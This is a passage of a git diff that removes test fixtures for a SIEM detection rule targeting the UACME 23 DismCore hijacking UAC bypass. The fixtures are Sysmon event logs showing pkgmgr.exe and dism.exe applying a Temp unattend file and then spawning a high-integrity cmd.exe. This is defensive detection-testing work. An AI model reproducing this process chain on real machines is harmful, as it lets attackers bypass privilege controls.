"object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059"} + \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc deleted file mode 100644 index e5f91d77..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_2.sc +++ /dev/null @@ -1,6 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-04T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-04T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-04T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-04T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect 2 {"correlation_name": "UACME_23_DismCore_Hijacking"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc deleted file mode 100644 index a1016d4b..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_3.sc +++ /dev/null @@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": 